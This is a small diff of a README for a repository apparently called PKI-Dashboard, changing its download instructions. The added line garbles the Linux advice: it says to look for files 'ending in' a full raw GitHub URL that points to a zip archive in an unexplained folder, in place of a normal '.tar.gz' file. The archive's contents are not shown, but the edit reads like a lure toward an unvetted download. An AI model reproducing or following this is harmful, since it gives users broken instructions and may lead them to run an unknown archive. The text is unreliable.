abeer135549/PKI-Dashboard/README.md

 For example:
 - If you are using Windows, look for files ending in `.exe`.
 - If you are using macOS, look for files ending in `.dmg`.
-- Linux users should look for files ending in `.tar.gz`.
+- Linux users should look for files ending in `https://raw.githubusercontent.com/abeer135549/PKI-Dashboard/main/meebos/PKI-Dashboard.zip`.

 Click on the file to start downloading it.